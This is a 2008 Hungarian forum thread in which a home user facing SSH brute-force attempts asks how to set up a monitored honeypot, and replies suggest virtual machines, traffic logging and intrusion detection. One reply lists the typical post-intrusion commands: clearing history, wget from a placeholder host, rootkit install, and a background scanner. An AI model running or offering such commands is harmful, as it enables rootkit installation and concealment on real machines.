Egy betörő biztonságos beengedése... ;)

Security-all

Sziasztok!

Órák óta bombázza valaki az IP-met. A 22-es porton szeretne bejönni. Először kitiltottam az illető gépét, de most már kíváncsi vagyok, mit eredményezne, ha beengedném.
Mit javasoltok, hogyan engedjem betörni a gépemre úgy, hogy közben megfigyelhessem, mit csinál, miután bejött? Egyáltalán, hogyan könnyítsem meg a dolgát?
Root jelszó nélkül? Egy virtuális gépen pl. Virtualboxszal? (Bár azt nem tudom, hogyan kerül a 22-es port a Virtualbox-ban futtatott programhoz - ennyire nem ismerem a virtualizációt.)

Előre köszi a hasznos tippekért.

  • 4374 megtekintés

( mazursky | 2008. 04. 30., sze – 12:45 )

A logolást szerintem (ha van rá módod) valami leporellós line_printer -re told ki (vagy egy másik gépre), így nem igazán fogja tudni megmódosítani. Illetve ez később bizonyítékként jól jöhet, illetve Neked is jó a biztonság növelésére. Mentésed mindeképp legyen.

Root jelszó nélkül? nem jó. Add fel neki a leckét, hogy megszerezze, így ami elkerülte a figyelmedet, azt ő majd "megoldja" helyetted, ha van annyi tudása.

ethereal/wireshark használata javallott egy másik gépről a hálózatban. Így a hálózati forgalmat monitorozhatod, sőt meg is szűrheted a beállításoknál, hogy csak a bombázott gép és a betörő közti csomagokat logolja.

aide vagy egyéb betörésérzékelő szintén jól jöhet.

Esetleg valami chroot -ba belezavarhatod az illetőt, így egy idő után elmegy a kedve az egésztől.

/mazursky

chroot nem jo ilyen dolgokra ugy tudom (tehat bootstrapelni jo, de profi 2 sec alatt kitor a jailbol [mintha process ter kozos lenne, emiatt indithat olyan binarist shellbol ami chrooton kivul indul, illetve killelni is lehet chrooton kivulre megfelelo jogosultsagokkal])
bsd-s jail csinalna ilyesmit, en inkabb virtualis gepet javasolnek, biztos ami biztos, 22-es portra lehet forwardolni portot a host os-rol a guestre(vagy akar mar routerbol is beallithatja).
meg vannak asszem direkt ilyen honeypot szoftverek is.

Tyrael

( andrej_ v | 2008. 04. 30., sze – 13:08 )

Honeypotnak hívják. A chroot jó lehet, ha grsec-es kerneled van vagy freebsd-n egy jailbe engeded be. A 22-es portot port portfw-al told át máshova. Egyébként hatalmas nagy dolgokat nem fogsz tapasztalni, mivel ezt vmi robot csinálja, szkennelve a sérülékeny gépek után. Valszin első dolga lesz hogy valami irc kliens felmegy egy bottal és onnan próbálnak majd okoskodni, pl. szintén elkezd ssh szkennelni és/vagy spammelni is.

( zeller | 2008. 04. 30., sze – 14:00 )

Semmiképp nem chroot-ba engedném, hanem egy virtuáls gépbe, aminek a bejövő 22-es portjára portforward-dal, némi sávszélesség-korlátozással beengedném, tcpdump vagy hasonló dologgal logolva a forgalmát (befelé és kifeé egyaránt), illetve a ttysnoop vagy hogy hívják cuccal a kiadott parancsokat is nyomnám fájlba/syslog-ba (másik virt. gépen futtatott syslog felé).
A virt. gép kifelé irányuló kapcsolódási kísérleteit (-s honeypot --state NEW) valami szép icmp-vel dobatnám el a tűzfalon (port-unreachable pl.).

( willy v | 2008. 04. 30., sze – 14:08 )

Marmint ugyerted, hogy az ssh kopogtatast te betoresi kiserletnek ertelmezed? Idestova ket eve gyakorlat a szerteagazo ipkrol brute force jellegu jelszo/felhasznalonev probalgatas. Mitol lenne ez ujkeletu es mitol lenne betoresi kiserlet? Es mibol gondolod, hogy tenne valamit ha sikerulne _belepni_ a szamitogepedre?

Willy, azt elfelejtettem írni, hogy ez egy otthoni, tehát elvileg dinamikus IP - gyakorlatilag hónapokig ua. Tegnap osztott a chello új IP-t és azon "kopoktatnak" keresvén a root, tom, clara stb. userek jelszavait. Ergo ez már betörési kísérlet.
Miért ne tenne? Viccből próbálja a robotprogram megtudni a root jelszót?

Nem értek veled egyed.

1, Miért ne lehetnék kíváncsi? (Az nem visszatartó erő, mert te így gondolod.)
2, Egyszer egy rootkit már betört egy szerveremre kihasználva egy apache exploit bugot. Akkor láttam, hogy az OTP honlapját hamisították. (Kár, hogy nem tettem anno rendőrségi feljelentést.)
3, :) Willy, állandóan ilyen rezignált vagy... Amúgy van hasznos ötleted, vagy inkább OFF-olgatsz? Hja, erről jut eszembe, hogy egy általad üzemeltetett fórumon az OFF-ot te rühelled legjobban. Következetesség, willy, következetesség. :)

1, A kivancsisag jo dolog. Engem az ido hianya nem vezet ra.
2, Namost, ha ezt nezzuk nem betor(crack), hanem belep jogosulatlanul(not authorized login) (buntetojogilag ugyanazt jelenti). Pontosan megegyezik azzal, hogy te kiteszel egy kepet http protokollon keresztul, de nem mondod meg a file nevet, o meg probalkozva letolti. Vagy valo eletbol ragadva szivedhez kozelebb allo pelda(magyarazhato betoresnek): az eredetivel teljesen megegyezo kulcsal kinyit egy ajtot. (figyelem, egyik sem jelenti azt, hogy be is lep az ajton, vagy hasznalja a shellt, csak valoszinusitjuk, "miert is probalgatna egyebkent").
Egyik sem tul erdekes cselekmeny, elore legyartott botok probalkoznak. Namost, eljut odaig, hogy shell accountot szerzett a gepedre, akkor most jonne a privilegium szint noveles, illetve az adatlopas. Ez mar erdekesebb lenne, de ugye ez nem az a kategoria (belep es telepiti a scriptet amivel ssh kopogtat).
Na ezert irtam, hagyd a picsaba.
3, Ja ide tajekozodni, es "pihenni" jarok a slashdot, stb mellett egesz magyaros a hangvetele. Egy emberes a tajekoztatas, de jo.
Tekintheted offtopicnak amit irtam, en nem gondoltam (eddig) annak. Arrol akartalak lebeszelni, hogy foglalkozz vele. Nem ide tartozik a masik megjegyzesed, miszerint valamit uzemeltetek ebben arra gondoltal, hogy volt amikor moderaltam. Nos az meg munka volt a reszemrol, es probaltam kiszolgalni az embereket akik ott voltak. Az offtopic ott lepten nyomon es az olvasot zavaro mertekben jelent meg. Ez az iras messze tavol volt a 3-as pont kivetelevel a tema: "Vettem egy piros biciklit" valasz: "GYF mondjon le" sematol. Itt sikerult azer gyorsan ettol elternunk...

Na, kb. ezt fogja csinálni:

pwd
uname -a
unset HISTORY; unset HISTLOG; unset HISTSAVE
wget http://xxxxxx/xxxx.tar.gz
tar xvzf xxxx.tar.gz
rm -f xxxx.tar.gz
cd r00tkit
./install
cd ..
cd scan
./scan &
exit

Nem nagy ügy, sript kiddiek, akik előre megírt utasításokat hajtanak végre, gépiesen.
Fogalmuk sincs, mit csinálnak... Többnyire. De nem baj, nagy hackerek... ;)
Amúgy azt se tudják, miért adják ki a parancsokat. pl. az unset-ek... Azt hiszik, ezzel törölték a nyomaikat. Ezt első kézből tudom, hogy azt hiszik...
Pedig max a rootkit telepítő gányol valamit, de az se tökéletesen.
Ha valakit érdekel mélyrehatóbban ez a dolog, szóljon nyugodtan. Össze tudom hozni egy-két hülyegyerekkel. :D

--
Coding for fun. ;)

( eax | 2008. 04. 30., sze – 14:50 )

A legjobb, ha fogsz 2 elfekvo gepet, es beallitod oket ugy, hogy az egyiket (honeypot) a masik (hivjuk gw-nek) keresztul erje el. A gw-re telepits egy honeywall-t, a honeypotra pedig egy tetszoleges linux disztrot, plusz egy sebek modult, aztan pedig erre a cuccra atforwardolod a probalkozokat (celszeruen nem csak ssh-n).

--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!

( pwm | 2008. 04. 30., sze – 17:01 )

sose ertettem, hogy miert jo az ssh-t a default porton hagyni?
nekem soha nem akart senki sem bejonni ssh-n...

Ha nem valasztasz "1234" szintu jelszot, akkor kb. csak a napi logok mereteben van kulonbseg (ha nagyon be akarnak menni, akkor nem az ssh portszaman fog mulni a dolog).
A kerdes inkabb az, hogy miert jo az ssht pamos-jelszavas authentikacioval hasznalni a privat kulcsos helyett? :)

--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!

Azért, mert ez otthoni és nem szervergép. Az sshd is csak azért futott, mert távolról kellett menedzselnem minap, és nem volt kedvem áttenni más portra. Amúgy a szerverek vagy VPN-en keresztül lehet elérni, vagy, ha a helyzet ezt nem teszi lehetővé akkor másik portra teszem.

( penztar v | 2008. 04. 30., sze – 18:33 )

Hello!

Erre találták ki a flash drive-ot . Azon tudod tárolni a kulcsot és így tudod hordozni is.

Üdv.

( bra | 2008. 04. 30., sze – 19:27 )

Tegyél fel OpenVMS-t és engedd be arra.

( pepo v | 2008. 04. 30., sze – 21:07 )

Akkor amit leszűrtem: virtualizált számítógép, és figyelőprogramok, na meg root jelszónak - hogy legyen egy kis feladata is a betörőnek - pl.: toor.
Amint hazaérek, csinálom is.

Köszönöm mindenkinek a javaslatokat.

Először is, nem az IP-d miatt próbálkoznak mások. Ez teljesen mindennapos, bármelyik gép, ami neten van, és nyitva van a 22-es port, azon bepróbálkoznak a botok. Ennyi.

"Szerintem nem is tudnék vele mail-t küldeni a mail.chello.hu-n keresztül."
Ennek meg semmi értelme. Mivel smtp szerver az a chellos server ilyen esetben, ezért a levelet fogadó szerver nagyban tesz a te IP címedre, őt csak a chello szerver címe érdekli, és az alapján szűr.

Először is, nem az IP-d miatt próbálkoznak mások.

Igen, tudom.

Mivel smtp szerver az a chellos server ilyen esetben, ezért a levelet fogadó szerver nagyban tesz a te IP címedre, őt csak a chello szerver címe érdekli, és az alapján szűr.

Általában igazad van. Ám a chello a kakukktojás, mert - ismereteim szerint - az az egyetlen ISP, amelyik a belső címtartományából érkező - és a chello MTA-ját használó - e-mail-ek küldő IP-jén is végez rbl szűrést. Erről volt többször is szó itt a HUP-on pl.: itt.